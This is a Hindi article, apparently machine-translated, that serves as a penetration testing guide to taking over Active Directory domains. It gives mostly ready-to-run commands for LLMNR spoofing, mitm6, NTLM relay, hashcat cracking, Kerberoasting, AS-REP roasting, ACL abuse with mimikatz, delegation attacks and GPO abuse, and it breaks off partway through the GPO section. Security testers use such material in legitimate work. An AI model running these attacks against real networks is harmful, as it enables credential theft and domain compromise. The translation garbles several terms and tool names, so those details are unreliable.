प्रवेश परीक्षण आयोजित करते समय, हम अक्सर डोमेन कॉन्फ़िगरेशन में त्रुटियों का पता लगाते हैं। हालांकि यह कई के लिए महत्वपूर्ण नहीं लगता है, वास्तव में, इस तरह की अशुद्धि के कारण पूरे डोमेन को समझौता किया जा सकता है।

उदाहरण के लिए, एक कंपनी में पंचक के परिणामों के अनुसार, हम इस निष्कर्ष पर पहुंचे कि डोमेन में सभी उपलब्ध मशीनें Windows10 / Windows Server2016 से कम नहीं थीं, और उन पर सभी नवीनतम पैच थे। नेटवर्क नियमित रूप से स्कैन किया गया था, मशीनें कठिन थीं। सभी उपयोगकर्ता टोकन के माध्यम से बैठे और उनके "20-चरित्र पासवर्ड" नहीं जानते थे। सब कुछ ठीक लग रहा है, लेकिन IPv6 को अक्षम नहीं किया गया है। डोमेन कैप्चर स्कीम इस प्रकार दिखती है:

mitm6 -> ntlmrelay -> प्रतिनिधिमंडल के माध्यम से हमला -> स्थानीय व्यवस्थापक पासवर्ड हैश प्राप्त होता है -> डोमेन व्यवस्थापक पासवर्ड हैश प्राप्त होता है।

दुर्भाग्य से, लोकप्रिय प्रमाणपत्र जैसे कि OSCP, GPEN, या CEH सक्रिय निर्देशिका पैठ परीक्षण नहीं सिखाते हैं।

इस लेख में, हम कई प्रकार के सक्रिय निर्देशिका हमलों पर ध्यान देंगे, जिन्हें हमने पेंट्स के हिस्से के रूप में, साथ ही साथ प्रयुक्त उपकरणों के रूप में किया था। यह किसी भी तरह से सभी प्रकार के हमलों और उपकरणों के लिए एक पूर्ण मार्गदर्शिका नहीं माना जा सकता है, वास्तव में उनमें से बहुत से हैं, और यह एक लेख में फिट होना मुश्किल है।

इसलिए, प्रदर्शन के लिए, हम काली लिनक्स 2019 पर एक लैपटॉप का उपयोग करते हैं और वर्चुअल होस्ट वीएमवेयर पर इस पर उठाए जाते हैं। कल्पना करें कि पंचक का मुख्य लक्ष्य डोमेन व्यवस्थापक अधिकार प्राप्त करना है, और इनपुट के रूप में हम ईथरनेट के माध्यम से कंपनी के कॉर्पोरेट नेटवर्क तक पहुंच रखते हैं। डोमेन का परीक्षण शुरू करने के लिए, हमें एक खाते की आवश्यकता है।

खाता हो रहा है

मेरी राय में, दो सबसे आम पर विचार करें, डोमेन खाता लॉगिन और पासवर्ड प्राप्त करने के तरीके: LLMNR / NBNS स्पूफिंग और IPv6 प्रोटोकॉल पर हमला।

एलएलएमएनआर / एनबीएनएस स्पूफिंग

इस हमले के बारे में काफी कुछ कहा गया है। लब्बोलुआब यह है कि क्लाइंट मल्टीकास्ट एलएलएमएनआर भेजता है और डीएनएस विफल होने पर मेजबान नामों को हल करने के लिए एनबीटी-एनएस अनुरोधों को प्रसारित करता है। कोई भी नेटवर्क उपयोगकर्ता ऐसे अनुरोधों का जवाब दे सकता है।

उपकरण जो एक हमले की अनुमति देते हैं:

• प्रत्युत्तर
• Inveight
• Metasploit मॉड्यूल: सहायक / स्पूफ / llmnr / llmnr_response, सहायक / स्पूफ / nbns / nbns_response,
  सहायक / सर्वर / कैप्चर / एसएमबी, सहायक / सर्वर / कैप्चर / http_ntlm

एक सफल हमले के साथ, हम उपयोगकर्ता के पासवर्ड का NetNTLM हैश प्राप्त कर सकते हैं।

Responder -I eth0 -wrf 

परिणामस्वरूप हैश, हम NTLM- रिले डिबग या निष्पादित कर सकते हैं।

IPv6 का हमला

यदि कॉर्पोरेट नेटवर्क में IPv6 का उपयोग किया जाता है, तो हम DHCPv6 अनुरोधों का जवाब दे सकते हैं और हमारे IP पते को हमलावर मशीन पर DNS सर्वर के रूप में सेट कर सकते हैं। चूंकि IPv6 IPv4 पर पूर्वता लेता है, इसलिए क्लाइंट DNS क्वेरी हमारे पते पर भेजी जाएंगी। हमले के बारे में यहाँ और पढ़ें।

उपकरण:

• mitm6

Mitm6 उपयोगिता चल रहा है

 mitm6 -i vmnet0 

हमले के पूरा होने के बाद, हमारे IPv6 पते के साथ एक नया DNS सर्वर हमले वाले कार्य केंद्र पर दिखाई देगा।



हमला मशीनों हमारे मशीन के साथ प्रमाणित करने की कोशिश करेंगे। Smbserver.py उपयोगिता का उपयोग करके एसएमबी सर्वर को ऊपर उठाने के बाद, हम उपयोगकर्ता पासवर्ड हैश प्राप्त कर सकते हैं।

 smbserver.py -smb2support SMB /root/SMB 

हैश एक्शन पर कब्जा कर लिया

अगला कदम या तो पासवर्ड हैश पर एक क्रिप्टोग्राफ़िक हमला करना है और पासवर्ड को स्पष्ट पाठ में प्राप्त करना है, या NTLS रिले करना है।

पासवर्ड जानवर बल

यह सरल है: एक पासवर्ड हैश, हैशटैक लें

 hashcat -m 5600 -a 3 hash.txt /usr/share/wordlists/rockyou.txt 

और क्रूर। पासवर्ड या तो प्राप्त किया जा सकता है या नहीं :)


हार्वे उपयोगकर्ता पासवर्ड बरामद किया गया है - Pbvf2019

एनटीएलएम रिले

हम NTLM रिले का निष्पादन भी कर सकते हैं। यह सुनिश्चित करने के बाद कि SMB हस्ताक्षर का उपयोग नहीं किया गया है , हम ntlmrelayx.py उपयोगिता का उपयोग करते हैं और एक हमले का संचालन करते हैं। यहां फिर से, लक्ष्य के आधार पर, हम उस वेक्टर का चयन करते हैं जिसकी हमें आवश्यकता है। आइए उनमें से कुछ पर विचार करें।

SMB प्रोटोकॉल के माध्यम से हमला मशीन तक पहुँच

कुंजी i के साथ एक हमला करें।

 ntlmrelayx.py -t 192.168.1.5 -l loot -i 

एक सफल हमले के साथ, हम netcat का उपयोग करके रिमोट मशीन से जुड़ सकते हैं।

डोमेन सूचना संग्रह

इस मामले में, हम डोमेन नियंत्रक से रिले करते हैं।

 ntlmrelayx.py -t ldap://192.168.1.2 

यदि हमला सफल होता है, तो हमें डोमेन के बारे में विस्तृत जानकारी मिल जाएगी:

डोमेन में एक नया कंप्यूटर जोड़ना

प्रत्येक उपयोगकर्ता डिफ़ॉल्ट रूप से डोमेन में 10 कंप्यूटर तक बनाने की क्षमता रखता है। कंप्यूटर बनाने के लिए, आपको ldaps प्रोटोकॉल का उपयोग करके डोमेन नियंत्रक पर एक रिले चलाने की आवश्यकता है। एक अनएन्क्रिप्टेड ldap कनेक्शन पर उपयोगकर्ता और कंप्यूटर बनाना प्रतिबंधित है। यदि SMB के माध्यम से कनेक्शन इंटरसेप्टेड है, तो भी, कोई खाता नहीं बनाया जा सकता है।

 ntlmrelayx.py -t ldaps://192.168.1.2 --add-computer 

जैसा कि आप चित्र में देख सकते हैं, हम एक कंप्यूटर RORYOTGS $ बनाने में सक्षम थे।

10 से अधिक कंप्यूटर बनाते समय, हमें निम्न फ़ॉर्म की त्रुटि मिलती है:



RORYOTGS $ कंप्यूटर की साख का उपयोग करते हुए, हम एक डोमेन नियंत्रक के लिए वैध अनुरोध कर सकते हैं।

डोमेन सूचना संग्रह

तो, हमारे पास एक डोमेन उपयोगकर्ता या कंप्यूटर खाता है। परीक्षण जारी रखने के लिए, हमें आगे की हमले की योजना के लिए उपलब्ध जानकारी एकत्र करने की आवश्यकता है। कुछ उपकरणों पर विचार करें जो हमें सबसे महत्वपूर्ण प्रणालियों की खोज का निर्धारण करने, योजना बनाने और किसी हमले को अंजाम देने में मदद करेंगे।

खोजी कुत्ता

सबसे महत्वपूर्ण उपकरणों में से एक जो लगभग सभी आंतरिक पैठ परीक्षण में उपयोग किया जाता है। परियोजना नई सुविधाओं द्वारा सक्रिय रूप से विकसित और पूरक है।


सूचना संग्रहकर्ता SharpHound.exe (स्थापित .NET v3.5 की आवश्यकता है) और स्क्रिप्ट SharpHound.ps1 को पॉवरशेल में लिखा गया है। एक थर्ड पार्टी पायथन डेवलपर, ब्लडहाउंड- पायथन द्वारा लिखित एक कंपाइलर भी है।

डेटाबेस के रूप में, Neo4j का उपयोग किया जाता है, जिसका अपना सिंटैक्स होता है, जो आपको कस्टम क्वेरी करने की अनुमति देता है। आप यहाँ सिंटैक्स के बारे में अधिक पढ़ सकते हैं।


डेवलपर्स DBCreator.py स्क्रिप्ट भी प्रदान करते हैं, जो आपको परीक्षण के लिए एक यादृच्छिक डेटाबेस उत्पन्न करने की अनुमति देता है।



Neo4j का REST API है। विभिन्न उपयोगिताओं हैं जो डेटाबेस से जुड़ सकते हैं और प्राप्त डेटा का उपयोग कर सकते हैं:

• CypherDog
• GoFetch
• ANGRYPUPPY
• GT-जनरेटर

आइए उनमें से कुछ पर विचार करें।

CypherDog

साइफोरडॉग एक ब्लडहाउंड शेल है जिसे शक्तियंत्र में लिखा गया है। 27 cmdlets शामिल हैं।



डिफ़ॉल्ट रूप से, neo4j डेटाबेस तक पहुंचने के लिए प्रमाणीकरण आवश्यक है। आप neo4j.conf फ़ाइल को संपादित करके प्रमाणीकरण को अक्षम कर सकते हैं। इसे लाइन dbms.security.auth_enabled = false को अनइंस्टॉल करने की आवश्यकता है । लेकिन यह अनुशंसित नहीं है, क्योंकि कोई भी उपयोगकर्ता डेटाबेस को 127.0.0.1:7474 (डिफ़ॉल्ट कॉन्फ़िगरेशन) से कनेक्ट कर सकता है। आप यहाँ neo4j में प्रमाणीकरण और प्राधिकरण के बारे में अधिक पढ़ सकते हैं ।

GoFetch

हमले की योजना बनाने और उसे अंजाम देने के लिए GoFetch ब्लडहाउंड में बनाए गए ग्राफ़ का उपयोग करता है।



हमला शुरू

 .\Invoke-GoFetch.ps1 -PathToGraph .\pathFromBloodHound.json 

GT-जनरेटर

जीईएच -जनरेटर , ब्लडहाउंड डेटा का उपयोग करके, गोल्डन टिकट बनाना आसान बनाता है। एक स्वर्ण टिकट प्राप्त करने के लिए, केवल KRBTGT उपयोगकर्ता के उपयोगकर्ता नाम और पासवर्ड हैश की आवश्यकता होती है।

 python gt-generator.py -s 127.0.0.1 -u user -p pass administrator <KRBTGT_HASH> 

PowerView

पॉवर व्यू एक पॉवरशेल फ्रेमवर्क है जिसमें पॉवरस्प्लोइट शामिल है। निम्नलिखित कुछ cmdlets की एक सूची है जो आपको एक डोमेन के बारे में जानकारी इकट्ठा करने में मदद कर सकती है।

Adidnsdump

सक्रिय निर्देशिका में एकीकृत DNS का उपयोग करते समय, कोई भी डोमेन उपयोगकर्ता सभी डिफ़ॉल्ट DNS रिकॉर्ड को क्वेरी कर सकता है।

उपकरण का इस्तेमाल किया: Adidnsdump

डोमेन अटैक

अब जब हमारे पास डोमेन जानकारी है, तो हम प्रवेश परीक्षण के अगले चरण पर जाते हैं - सीधे हमले के लिए। 4 संभावित वैक्टर पर विचार करें:

1. भूनना
2. एसीएल के माध्यम से हमला
3. कर्बरोस प्रतिनिधिमंडल
4. जीपीओ अनुमतियों का दुरुपयोग

भूनना

इस तरह के हमले से केर्बरोस प्रोटोकॉल को निशाना बनाया जाता है। रोस्टिंग जैसे 2 प्रकार के हमले हैं:

• Kerberoast
• Asreproast

Kerberoast

हमला पहली बार 2014 में डर्बीकॉन में उपयोगकर्ता टाइममेडिन द्वारा प्रदर्शित किया गया था ( वीडियो )। एक सफल हमले के साथ, हम उपयोगकर्ता को अवरुद्ध करने के डर के बिना, ऑफ़लाइन मोड में सेवा अल्ट्रासाउंड के पासवर्ड को सॉर्ट करने में सक्षम होंगे। अक्सर, सेवा खातों में अत्यधिक अधिकार और एक स्थायी पासवर्ड होता है, जो हमें डोमेन व्यवस्थापक अधिकार प्राप्त करने की अनुमति दे सकता है।
हमले के सार को समझने के लिए, विचार करें कि केर्बरोस कैसे काम करता है।



1. पासवर्ड NTLM हैश में बदल जाता है, टाइमस्टैम्प को हैश के साथ एन्क्रिप्ट किया जाता है और TGT टिकट अनुरोध (AS-REQ) में एक प्रामाणिक के रूप में KDC को भेजा जाता है। डोमेन नियंत्रक (KDC) उपयोगकर्ता जानकारी की जाँच करता है और TGT टिकट बनाता है।

2. TGT टिकट एन्क्रिप्ट किया गया है, हस्ताक्षरित है और उपयोगकर्ता (AS-REP) को भेजा गया है। केवल केर्बरोस सेवा (KRBTGT) TGT टिकट से डेटा खोल और पढ़ सकती है।

3. TGS टिकट (TGS-REQ) का अनुरोध करने पर एक उपयोगकर्ता एक डोमेन नियंत्रक को TGT टिकट भेजता है। डोमेन नियंत्रक एक TGT टिकट खोलता है और PAC चेकसम को चेक करता है।

4. TGS टिकट सेवा खाते के पासवर्ड के NTLM हैश के साथ एन्क्रिप्ट किया गया है और उपयोगकर्ता (TGS-REV) को भेजा जाता है।

5. उपयोगकर्ता उस कंप्यूटर को एक TGS टिकट प्रदान करता है जिस पर सेवा चल रही है (AP-REQ)। सेवा अपने NTLM हैश का उपयोग करके TGS टिकट खोलती है।

6. सेवा तक पहुंच प्रदान की जाती है (एएस-आरईपी)।

टीजीएस-टिकट (टीजीएस-आरईपी) प्राप्त करने के बाद, हम सेवा खाते के लिए पासवर्ड ऑफ़लाइन पा सकते हैं। उदाहरण के लिए, हैशटैक का उपयोग करना।

RFC396 के अनुसार, 20 प्रकार के एन्क्रिप्शन Kerberos प्रोटोकॉल के लिए आरक्षित हैं। प्राथमिकता के क्रम में अब उपयोग किए जाने वाले एन्क्रिप्शन के प्रकार:

• AES256_CTS_HMAC_SHA1
• AES128_CTS_HMAC_SHA1
• RC4_HMAC_MD5

विंडोज के हाल के संस्करणों में, एईएस एन्क्रिप्शन का उपयोग डिफ़ॉल्ट रूप से किया जाता है। लेकिन विंडोज विस्टा और विंडोज 2008 सर्वर के नीचे सिस्टम के साथ संगतता के लिए, RC4 एल्गोरिदम के लिए समर्थन की आवश्यकता है। एक हमले का संचालन करते समय, हमेशा RC4_HMAC_MD5 एन्क्रिप्शन के साथ TGS टिकट प्राप्त करने का प्रयास किया जाता है, जो तेज़ पासवर्ड और फिर बाकी की अनुमति देता है। हर्मजे 0 ने एक दिलचस्प अध्ययन किया और पाया कि यदि आप उपयोगकर्ता के गुणों में केवल केर्बरोस एईएस128 और एईएस 256 एन्क्रिप्शन समर्थन को निर्दिष्ट करते हैं, तो केर्बरोस टिकट अभी भी RC4_HMAC_MD5 एन्क्रिप्शन के साथ जारी किया जाता है।



डोमेन स्तर पर RC4_HMAC_MD5 को निष्क्रिय करना आवश्यक है ।

करबरोस्टिंग हमले में 2 दृष्टिकोण हैं।

1. पुरानी विधि। TGS टिकट के लिए setpn.exe या .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken के माध्यम से अनुरोध किया गया है, जो पॉवर्सशेल वर्ग का है, mimikatz का उपयोग करके मेमोरी से पुनर्प्राप्त किया गया है, फिर वांछित प्रारूप (जॉन, हैसकैट) में परिवर्तित किया गया और सॉर्ट किया गया।

2. नई विधि। machosec ने देखा कि KerberosRequestorSecurityToken क्लास में GetRequest विधि है, जो TGS टिकट से पासवर्ड के साथ एन्क्रिप्टेड भाग को निकालता है।

हमले के लिए उपकरण:

1) SPN रिकॉर्ड के लिए खोजें

• GetUserSPN.ps1
• खोजें-PSServiceAccounts.ps1
• Get-NetUSER -SPN
• (Get-ADUser -Filter {ServicePrincipalName -ne "$ null"} -Properties ServicePrincipalName) .ServicePrincipalName

2) एक TGS टिकट का अनुरोध करें

• setpn.exe (मूल Windows उपयोगिता)
• शक्तियों के माध्यम से टिकट अनुरोध
  
  

   Add-Type -AssemblyNAme System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<ServicePrincipalName>” 

• अनुरोध-SPNTicket

आप किटल कमांड का उपयोग करके वर्तमान कैश्ड टिकट देख सकते हैं।


3) टिकटों का निर्यात:

• आह्वान-मिमिक्ज -कोमांड '' केर्बरोस :: सूची / निर्यात "'
• Mimikatz -Command '"Kerberos :: सूची / निर्यात"'
• Invioke-Kerberoast
• tgsrepack.py

सभी 3 बिंदुओं के स्वचालित निष्पादन का एक उदाहरण:

• RiskySPN
  
  

   Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File kerberoasting.txt 

• PowerSploit
  
  

   Invoke-Kerberoast -Domain jet.lab -OutputFormat Hashcat | fl 

• GetUserSPNs.py
  
  

   GetUserSPNs.py -request jet.lab\user:Password 

Asreproast

भेद्यता यह है कि Kerberos पूर्व-प्रमाणीकरण अक्षम है। इस मामले में, हम एक ऐसे उपयोगकर्ता को AS-REQ अनुरोध भेज सकते हैं जिनके पास केर्बोस पूर्व-प्रमाणीकरण अक्षम है, और पासवर्ड के साथ एन्क्रिप्टेड भाग प्राप्त करें।



भेद्यता दुर्लभ है, क्योंकि प्रचार अक्षम करना डिफ़ॉल्ट सेटिंग नहीं है।

केर्बरोस प्रमाणीकरण के साथ उपयोगकर्ताओं के लिए खोज अक्षम:

• PowerView
  
  

   Get-DomainUser -PreauthNotRequired -Properties samaccountname -Verbose 

• सक्रिय निर्देशिका मॉड्यूल
  
  

   get-aduser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name 

एन्क्रिप्टेड भाग प्राप्त करना:

• ASREPRoast
  
  

   Invoke-ASREPROast | fl 

  
  

एसीएल के माध्यम से हमला

एक डोमेन संदर्भ में एक ACL नियमों का एक समूह है जो AD में वस्तुओं के उपयोग के अधिकार को परिभाषित करता है। एक एसीएल को एकल ऑब्जेक्ट (उदाहरण के लिए, एक उपयोगकर्ता खाता) या एक संगठनात्मक इकाई के लिए कॉन्फ़िगर किया जा सकता है, उदाहरण के लिए, OU। जब आप ACL को OU पर कॉन्फ़िगर करते हैं, तो OU के भीतर सभी ऑब्जेक्ट ACL को इनहेरिट करेंगे। ACL में अभिगम नियंत्रण प्रविष्टियाँ (ACEs) होती हैं जो यह निर्धारित करती हैं कि SID सक्रिय निर्देशिका ऑब्जेक्ट के साथ कैसे इंटरैक्ट करता है।

उदाहरण के लिए, हमारे तीन समूह हैं: A, B, C, जहां समूह C समूह B का सदस्य है और समूह B समूह A का सदस्य है। जब आप समूह C में अतिथि जोड़ते हैं, तो अतिथि न केवल समूह C का सदस्य होगा, बल्कि समूह बी और ए के एक अप्रत्यक्ष सदस्य जब समूह ए के लिए एक डोमेन ऑब्जेक्ट तक पहुंच जोड़ते हैं, तो अतिथि उपयोगकर्ता के पास भी इस ऑब्जेक्ट तक पहुंच होगी। ऐसी स्थिति में जहां उपयोगकर्ता केवल एक समूह का प्रत्यक्ष सदस्य है, और यह समूह अन्य 50 समूहों का अप्रत्यक्ष सदस्य है, विरासत में मिली अनुमतियों के कनेक्शन को खोना आसान है।

आप निम्न कमांड चलाकर ऑब्जेक्ट से जुड़े ACL को पुनः प्राप्त कर सकते हैं

 Get-ObjectACL -Samaccountname Guest -ResolveGUIDs 

आप ACL कॉन्फ़िगरेशन में त्रुटियों का फायदा उठाने के लिए उपकरण का उपयोग कर सकते हैं।
आह्वान-ACLPwn । पॉवरशेल स्क्रिप्ट ब्लडहाउंड कलेक्टर, शार्पहाउंड का उपयोग करके डोमेन के सभी एसीएल के बारे में जानकारी एकत्र करती है, और राइटडैक अनुमति प्राप्त करने के लिए एक चेन बनाती है। श्रृंखला के निर्माण के बाद, स्क्रिप्ट श्रृंखला के प्रत्येक चरण का संचालन करती है। स्क्रिप्ट का क्रम:

1. उपयोगकर्ता को आवश्यक समूहों में जोड़ा जाता है।
2. डोमेन ऑब्जेक्ट के ACL में दो ACE (रेप्लिकेटिंग डायरेक्टरी चेंजेस और रिप्लेक्टिंग डायरेक्टरी चेंजेज ऑल) जोड़े जाते हैं।
3. यदि आपके पास Mimikatz उपयोगिता का उपयोग करके DCSync के अधिकार हैं, तो उपयोगकर्ता krbtgt का पासवर्ड हैश अनुरोध किया गया है (डिफ़ॉल्ट सेटिंग)।
4. ऑपरेशन पूरा होने के बाद, स्क्रिप्ट एसीएल में सभी जोड़े गए समूहों और एसीई प्रविष्टियों को हटा देती है।

स्क्रिप्ट केवल राइटडेक अनुमतियों का उपयोग करने के उद्देश्य से है। एक हमलावर के लिए निम्नलिखित पहुँच अधिकार भी रुचि के हो सकते हैं:

• ForceChangePassword। वर्तमान पासवर्ड ज्ञात नहीं होने पर उपयोगकर्ता पासवर्ड बदलने का अधिकार। PowerSploit के साथ ऑपरेशन - Set-DomainUserPassword।
• AddMembers। समूहों, कंप्यूटरों और उपयोगकर्ताओं को समूहों में जोड़ने का अधिकार। PowerSploit के साथ ऑपरेशन - Add-DomainGroupMember।
• GenericWrite। किसी वस्तु की विशेषताओं को बदलने के अधिकार। उदाहरण के लिए, scriptPath पैरामीटर का मान बदलें। अगली बार जब उपयोगकर्ता सिस्टम पर लॉग करता है, तो निर्दिष्ट फ़ाइल शुरू होती है। पॉवरस्प्लोइट के साथ ऑपरेशन - सेट-डोमेनऑब्जेक्ट।
• WriteOwner। वस्तु के मालिक को बदलने के अधिकार। PowerSploit के साथ ऑपरेशन - Set-DomainObjectOwner।
• AllExtendedRights। उपयोगकर्ताओं को समूहों में जोड़ने के लिए अधिकार, उपयोगकर्ता पासवर्ड बदलने आदि, PowerSploit - Set-DomainUserPassword या Add-DomainGroupMember के साथ संचालन।

ऑपरेशन:

• आह्वान-ACLPwn

एक मशीन से शुरू जो एक डोमेन में है

 ./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe 

एक मशीन से शुरू करना जो एक डोमेन में नहीं है

 /Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'domain\user' -Domain 'fqdn_of_target_domain' -Password 'Pass' 

• aclpwn.py एक समान उपकरण है जिसे पायथन में लिखा गया है

कर्बरोस प्रतिनिधिमंडल

प्राधिकरण का कर्बेरोस प्रतिनिधिमंडल आपको किसी अन्य सर्वर पर होस्ट किए गए संसाधनों तक पहुंचने के लिए अंतिम-उपयोगकर्ता क्रेडेंशियल्स का पुन: उपयोग करने की अनुमति देता है।

कर्बरोस प्रतिनिधिमंडल तीन प्रकार का हो सकता है:

1. असीमित (असंवैधानिक प्रतिनिधिमंडल)। Windows Server 2003 से पहले एकमात्र प्रतिनिधिमंडल विकल्प
2. विंडोज सर्वर 2003 के बाद से विवश प्रतिनिधिमंडल
3. संसाधन-आधारित विवश प्रतिनिधि विंडोज सर्वर 2012 में पेश किया गया

असीमित प्रतिनिधिमंडल

सक्रिय निर्देशिका स्नैप-इन में, असीमित प्रतिनिधि सुविधा सक्षम है जो निम्नानुसार है:



स्पष्टता के लिए, विचार करें कि आरेख पर असीमित प्रतिनिधिमंडल कैसे होता है।

1. यूजर का पासवर्ड ntlm हैश में बदल जाता है। टाइमस्टैम्प को इस हैश के साथ एन्क्रिप्ट किया गया है और टीजीटी टिकट का अनुरोध करने के लिए डोमेन नियंत्रक को भेजा गया है।
2. डोमेन नियंत्रक उपयोगकर्ता के बारे में जानकारी की जाँच करता है (लॉगऑन पर प्रतिबंध, समूहों में सदस्यता आदि), एक टीजीटी टिकट बनाता है और उपयोगकर्ता को भेजता है। TGT टिकट एन्क्रिप्टेड है, हस्ताक्षरित है, और केवल krbtgt इसका डेटा पढ़ सकता है।
3. उपयोगकर्ता वेब सर्वर पर वेब सेवा तक पहुंचने के लिए टीजीएस टिकट का अनुरोध करता है।
4. डोमेन नियंत्रक एक TGS टिकट प्रदान करता है।
5. उपयोगकर्ता वेब सर्वर पर TGT और TGS टिकट भेजता है।
6. वेब सर्वर सेवा खाता डेटाबेस सर्वर तक पहुँचने के लिए TGS टिकट का अनुरोध करने के लिए उपयोगकर्ता के TGT टिकट का उपयोग करता है।
7. सेवा खाता उपयोगकर्ता के रूप में डेटाबेस सर्वर से जुड़ता है।

असीमित प्रतिनिधिमंडल का मुख्य खतरा यह है कि जब असीमित प्रतिनिधिमंडल के साथ एक मशीन समझौता किया जाता है, तो एक हमलावर इस मशीन से उपयोगकर्ताओं के टीजीटी टिकट प्राप्त कर सकेगा और इन उपयोगकर्ताओं की ओर से डोमेन में किसी भी सिस्टम तक पहुंच प्राप्त कर सकेगा।

असीमित प्रतिनिधिमंडल वाले डोमेन में मशीनों की खोज करें:

• PowerView
  
  

   Get-NetComputer -unconstrained 

• सक्रिय निर्देशिका मॉड्यूल
  
  

   Get-Adcomputer -Filter {TrustedForDelegation -eq $True} 

  ।

टिकट निर्यात:

• Mimikatz का उपयोग करना। sekurlsa :: टिकट / निर्यात
• आप पास-द-टिकट हमले भी कर सकते हैं।
  
  

    kerberos::ptt C:\tickets\. 

सीमित प्रतिनिधिमंडल

सीमित प्रतिनिधिमंडल की विधि आपको केवल अनुमत सेवाओं और एक विशिष्ट मशीन तक पहुंचने की अनुमति देती है। सक्रिय निर्देशिका स्नैप-इन में, यह इस तरह दिखता है:



सीमित प्रतिनिधिमंडल के साथ, 2 केर्बरोस प्रोटोकॉल एक्सटेंशन का उपयोग किया जाता है:

• S4USelf
• S4UProxy

S4U2Self का उपयोग तब किया जाता है जब ग्राहक केर्बरोस प्रोटोकॉल का उपयोग करके प्रमाणित नहीं करता है।

असीमित प्रतिनिधिमंडल के लिए, TGT का उपयोग उपयोगकर्ता की पहचान करने के लिए किया जाता है, जिस स्थिति में S4U एक्सटेंशन PAata -FOR-USER संरचना का उपयोग करता है क्योंकि नए प्रकार के पैडेटा / पूर्व-प्रमाणीकरण डेटा क्षेत्र में। S4U2self प्रक्रिया को केवल तभी अनुमति दी जाती है जब अनुरोध करने वाले उपयोगकर्ता के पास अपने उपयोगकर्ताअकाउंटकंट्रोल में TRUSTED_TO_AUTH_FOR_DELEGATION फ़ील्ड सेट हो।



S4U2Proxy सेवा खाते को अनुमति दी गई सेवाओं (msds-allowtodelegateto) तक पहुंच के लिए TGS टिकट का अनुरोध करने के लिए S4U2proxy प्रक्रिया में प्राप्त पुनर्निर्देशित टिकट का उपयोग करने की अनुमति देता है। KDC यह जाँच करता है कि क्या अनुरोधित सेवा अनुरोध करने वाले उपयोगकर्ता के msds-allowtodelegateto फ़ील्ड में निर्दिष्ट है, और चेक सफल होने पर टिकट जारी करता है। इस प्रकार, प्रतिनिधिमंडल विशिष्ट लक्ष्य सेवाओं के लिए "सीमित" है।



आप PowerView का उपयोग करके सीमित प्रतिनिधि डोमेन में कंप्यूटर और उपयोगकर्ताओं के लिए खोज कर सकते हैं ।

असीमित प्रतिनिधिमंडल के साथ कंप्यूटर की खोज करें

 Get-DomainComputer -TrustedtoAuth 

सीमित प्रतिनिधि उपयोगकर्ताओं के लिए खोजें

 Get-DomainUser -TrustedtoAuth 

एक हमले का संचालन करने के लिए, हमें एक स्पष्ट पासवर्ड, एक NTLM पासवर्ड हैश, या एक TGT टिकट की आवश्यकता होती है।

संसाधन आधारित सीमित प्रतिनिधिमंडल

नियमित प्रतिनिधिमंडल के साथ, S4U एक्सटेंशन का उपयोग किया जाता है। चूंकि संसाधन-आधारित प्रतिनिधिमंडल मुख्य रूप से सीमित प्रतिनिधिमंडल है, ऐसे हमले जो नियमित सीमित प्रतिनिधिमंडल के लिए प्रासंगिक हैं, वे भी यहां उपलब्ध हैं। अंतर केवल इतना है कि एक साधारण सीमित प्रतिनिधिमंडल में, सेवा A के पास msDS-AllowedToDelegateTo = ServiceB विशेषता होनी चाहिए, और यहाँ सेवा B में msDS-AllowedToActOnBehalfOfhtherOdentity = सेवा A विशेषता होनी चाहिए ।



यह गुण harmj0yy द्वारा प्रकाशित एक और हमले की अनुमति देता है ।। एक हमले के लिए प्रिंसिपलों को संशोधित करने की अनुमति की आवश्यकता होती हैअनुप्राप्तऑटोडेलगेटगेटऑकाउंट पैरामीटर, जो एमएसडीएस-ऑल्टेडटॉएक्टऑनबेफॉलऑफऑथरिटी विशेषता को सेट करता है, जिसमें एक्सेस कंट्रोल लिस्ट (एसीएल) होता है। केवल सीमित प्रतिनिधिमंडल के विपरीत, हमें msds-AllowedToActOnBehalfOfOtherIdentity विशेषता को बदलने के लिए डोमेन व्यवस्थापक अधिकारों की आवश्यकता नहीं है। आप यह जान सकते हैं कि विशेषता को संपादित करने की अनुमति किसके पास है:

 (Get-acl "AD:$((get-adcomputer Windows7).distinguishedname)").access | Where-Object -Property ActiveDirectoryRights -Match WriteProperty |out-gridview 

इसलिए, हमले को अंजाम देने के लिए, mitm6 पर अमल करें

 mitm6 -I vmnet0 

हम ntlmrelayx को विकल्प के साथ शुरू करते हैं - डेलीगेट-ऐक्सेस

 ntlmrelayx -t ldaps://dc1.jet.lab --delegate-access 

हमले के परिणामस्वरूप, ZGXTPVYX $ कंप्यूटर को विंडोज 7 कंप्यूटर के प्रतिनिधिमंडल अधिकारों के साथ बनाया गया है।

 $x = Get-ADComputer Windows7 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity $x.'msDS-AllowedToActOnBehalfOfOtherIdentity'.Access 

Yegor Podmokov द्वारा PHDays में एक अच्छा प्रतिनिधिमंडल रिपोर्ट प्रस्तुत किया गया ।

जीपीओ अनुमतियों का दुरुपयोग

समूह नीति ऑब्जेक्ट एक उपकरण है जो प्रशासकों को कुशलतापूर्वक एक डोमेन का प्रबंधन करने की अनुमति देता है। लेकिन ऐसा होता है कि उपयोगकर्ताओं को अनावश्यक अधिकार दिए जाते हैं, जिसमें GPO नीतियों को बदलना शामिल है।

उदाहरण को प्रदर्शित करने के लिए, हम Ragnar उपयोगकर्ता को डिफ़ॉल्ट डोमेन नियंत्रक नीति (वास्तविक जीवन में, इस नीति के अधिकार केवल डोमेन प्रशासक को दिए गए हैं, संपादित करने के लिए अधिकार जोड़ देंगे, लेकिन हमले का सार नहीं बदलता है; दूसरी नीति के मामले में, केवल नियंत्रित मेजबान परिवर्तन होता है)। PowerView



का उपयोग करके डोमेन के सभी GPO के अधिकारों की गणना करें ।

 Get-NetGPO | % {Get-ObjectAcl -ResolveGUIDs -Name $_.Name} 

